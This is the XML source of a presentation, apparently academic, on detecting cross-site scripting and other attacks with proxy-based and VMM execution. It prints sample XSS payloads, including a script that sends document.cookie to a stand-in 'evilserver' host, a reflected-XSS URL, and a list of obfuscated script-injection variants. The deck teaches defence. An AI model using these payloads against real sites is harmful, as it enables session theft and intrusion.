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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="301" r:id="rId3"/>
    <p:sldId id="286" r:id="rId4"/>
    <p:sldId id="310" r:id="rId5"/>
    <p:sldId id="333" r:id="rId6"/>
    <p:sldId id="325" r:id="rId7"/>
    <p:sldId id="32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335" r:id="rId16"/>
    <p:sldId id="313" r:id="rId17"/>
    <p:sldId id="314" r:id="rId18"/>
    <p:sldId id="311" r:id="rId19"/>
    <p:sldId id="294" r:id="rId20"/>
    <p:sldId id="322" r:id="rId21"/>
    <p:sldId id="331" r:id="rId22"/>
    <p:sldId id="261" r:id="rId23"/>
    <p:sldId id="327" r:id="rId24"/>
    <p:sldId id="323" r:id="rId25"/>
    <p:sldId id="308" r:id="rId26"/>
    <p:sldId id="284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3C1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75" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="127" d="100"/>
          <a:sy n="127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595E857-70F2-4E30-8856-275B013607FE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0D87B882-E55F-4E42-A1B2-F7E8F7774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536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E357F7A-A53D-4A0A-A511-8F1A19D29EB9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969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/>
              <a:t>31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174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/>
              <a:t>31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379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/>
              <a:t>31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58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/>
              <a:t>31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91140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D852B4E-5094-43ED-BB15-9A0744559200}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>16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931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96FE3A9-62C4-407C-A03C-71696D1D6931}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>17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84996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1FF8F6-4EB6-4FA4-889A-44288ADE89E0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>18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891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/>
              <a:t>31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752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altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>31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7168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DAA7A2-4324-494C-BA63-021D4A6F4454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741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DEF37E-DFD4-4FBA-A1D1-2EC9B30FBA79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1776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C67F0AD-CC18-419C-AE34-34CB5F960A6B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>23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9572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altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>31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757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A2CB74-0279-41C9-8005-7B43E1F4122B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778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445B16-0160-4737-908F-16155ED974F7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7987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3FBC71-07FF-4E66-BAD6-F0A886EB68EA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150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/>
              <a:t>31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829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CFD9B1A-C2DE-4F28-A214-F9075B533850}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>4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1366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5E55EDC-B56F-4474-A4B5-0748AF651BB3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>6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15716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52AD923-5C0D-460A-84DC-863C516E1C96}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>7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355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/>
              <a:t>31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/>
              <a:t>31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765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/>
              <a:t>31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508A6-F078-45D3-883D-09660CE15125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5F8CF-B1D1-4A57-A341-B7E3DBDB5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8ADDC-A7BD-4516-BAD9-AFBC4C0A1C5D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DC226-74BB-484F-8E2D-E873CD7CF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FEDCD-441E-40A9-8E94-06D845A2BEB1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B7210-4010-4CB1-B9FE-5F79AD934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A74A0-A19D-412D-BAE1-87D58D7EB055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E815B-2CF5-4391-B074-47EECC7BB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A98F8-B968-4B37-8DEC-4A34D7DA10A7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AFFE9-DBA8-45B5-A4DA-C0878B9EE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28AE1-9A60-4860-8F4D-1D91EBE7098A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4A376-7780-49D8-9160-5EE2C5A5B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D125B-841A-467B-A562-7798E45CE55B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D5FF4-C549-4B16-88B0-90CCFFA17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5300E-5F39-464A-9481-4F86033B7E16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08857-E22B-4C37-8DAB-570AB29A7C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DB220-897D-4FC9-8196-B88E4B956C7E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0A806-0EC0-49A6-8730-683599963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23E32-FD6E-4E1F-91C2-CA16061EC5CD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54B70-19DF-487C-90D1-4D1222AA4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E0CE9-8F9C-40BA-98C1-2AA355A8A1CC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EC243-695B-45D5-A0E9-4A7AE09E2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1A8DFE9-E05E-4F2E-9A35-083BE1450037}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2/12/2009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8D9C884-F339-4648-B5D3-FFFB2C12C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47" r:id="rId9"/>
    <p:sldLayoutId id="2147483746" r:id="rId10"/>
    <p:sldLayoutId id="214748374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mtClean="0"/>
              <a:t>Detection of Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>with Proxy-based Execution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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Cross-site Scripting (XSS) attack, an attacker forces a client, typically a web browser, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute attacker-supplied executable code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, typically JavaScript code, which runs in the context of a trusted web site</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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A5A3F6D5-D351-4326-A5DD-9AC2DBAD4E0A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/50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XSS: Two kinds</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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xfrm>
            <a:off x="428625" y="1341438"/>
            <a:ext cx="8175625" cy="4791075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CN" dirty="0" smtClean="0"/>
              <a:t>Two general methods for injecting malicious code into web page that is displayed to the user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CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> the attacker persistently stores the malicious code in a resource managed by the web application. such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>="image.jpg"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>document.images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = "http://evilserver/image.jpg?stolencookie=" &gt;+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;  &lt;/script&gt;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CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>: the attack script is not persistently stored, but, instead, it is immediately “reflected” back to the user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CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>http://www.vulnerable.site/welcome.cgi?name=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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zh-CN" altLang="en-US" dirty="0" smtClean="0"/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6C64B574-2C8C-4EB9-B3E8-CB01255E19AF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l"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标题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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>XSS:More</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>difficult </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to be detected and more harmful for Internet.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459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40AD11B6-E7BD-40B4-AF3E-5ED616F40E66}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="矩形 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214313" y="1428750"/>
            <a:ext cx="8572500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1. &lt;html&gt;&lt;head&gt;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2. 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&lt;script src="a.js"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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3. &lt;script&gt; ... &lt;/script&gt;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4. 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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for=foo event=onmouseover&gt; ... &lt;/script&gt;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5. &lt;style&gt;.bar{background-image:url("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javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>alert(’JavaScript’)");}&lt;/style&gt;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6. &lt;/head&gt;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7. &lt;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body onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="alert(’JavaScript’)"&gt;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8. &lt;img id=foo src="image.jpg"&gt;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9. &lt;a class=bar&gt;&lt;/a&gt;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10. &lt;div style="background-image: url(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javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>alert(’JavaScript’))"&gt;...&lt;/div&gt;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11. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="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javas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>]]&gt;&lt;![CDATA[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cript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(’XSS’);"&gt;]]&gt;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12. &lt;meta http-equiv="refresh" content="0;url=data:text/html;base64,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PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;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13. &lt;img src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=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&gt;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14. &lt;img src=javascript:alert</a:t>
            </a:r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(&amp;quot;3&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;)&gt;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zh-CN" sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>15. &lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="矩形标注 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2857500" y="1143000"/>
            <a:ext cx="2476500" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -84037"/>
              <a:gd name="adj2" fmla="val 74968"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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Embeds a script contained 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in a separate file</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0725" name="矩形标注 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="2000250"/>
            <a:ext cx="1500188" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -84037"/>
              <a:gd name="adj2" fmla="val 74968"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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an event handler</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0726" name="矩形标注 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5643563" y="1785938"/>
            <a:ext cx="1857375" cy="785812"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -53829"/>
              <a:gd name="adj2" fmla="val 68356"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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background elements 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will be obtained by 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executing a script.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0727" name="矩形标注 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3571875" y="3357563"/>
            <a:ext cx="2447925" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43639"/>
              <a:gd name="adj2" fmla="val 93222"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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an element that uses an inline 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CSS style to invoke a script</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0728" name="矩形标注 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6357938" y="3143250"/>
            <a:ext cx="2143125" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5995"/>
              <a:gd name="adj2" fmla="val 119458"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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script in XML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script can be broken across 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multiple CDATA sections</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0729" name="矩形标注 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5143500" y="4643438"/>
            <a:ext cx="3714750" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79472"/>
              <a:gd name="adj2" fmla="val 49301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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URL is the base64 encoding of a javascript:URL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0730" name="矩形标注 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4786313" y="5214938"/>
            <a:ext cx="2643187" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79472"/>
              <a:gd name="adj2" fmla="val 49301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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URL has been character encoded</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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0731" name="矩形标注 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4786313" y="6000750"/>
            <a:ext cx="2500312" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63736"/>
              <a:gd name="adj2" fmla="val -898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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HTML entity encoding to hide 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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>quote characters in a script</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="0070C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Why difficult to detect</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32770" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="1341438"/>
            <a:ext cx="8715375" cy="4791075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0"/>
              <a:t>Signatures for application vulnerability are based on the applications which are commonly used. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One signature can cover a vulnerability a lot of servers may have. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0"/>
              <a:t>However, each website has its own code, and corresponding vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0"/>
              <a:t>2. Script vulnerabilities are not easy to describe by signature, because it has many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subtleties and variants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0"/>
              <a:t>3. Sometimes, it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not a vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" smtClean="0"/>
              <a:t>of the website. The attack may have compromise this website and change the web page by append its own malicious code without web master’s attention.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="250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B8910E9D-A27E-41AA-8DF1-3CBB116EA988}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/50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Current method</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="1341438"/>
            <a:ext cx="8318500" cy="4791075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CN" smtClean="0"/>
              <a:t>A comprehensive research on web security, particularly  in cross site scripting started around 2001. Categories of solutions are based on the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CN" smtClean="0"/>
              <a:t>Location :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client side ,server side, third part check point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CN" smtClean="0"/>
              <a:t>Analysis type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static, dynamic, taint, alias, data flow, source code, control flow graph.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CN" smtClean="0"/>
              <a:t>Technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crawling, reverse engineering, black box testing, proxy server.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CN" smtClean="0"/>
              <a:t>Intrusion detection type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anomaly, misuse, automatic, multimodal.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556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9192EDC5-9292-45C9-AFAD-26610F33A7BC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>14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VMMs for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software within a sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filter system calls made and interactions with the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Full access to the OS’s state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52800" y="5791200"/>
            <a:ext cx="22860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VMM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352800" y="4876800"/>
            <a:ext cx="22860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VM w/ Guest OS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19600" y="4953000"/>
            <a:ext cx="990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Browser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514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Detecting Attacks with VMMs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9011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1" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Memory Inspection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Garfinkel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> ‘03)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Uses Mission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Critical’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t>crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>utility to acquire state (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t>crash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> normally reads /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>kmem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
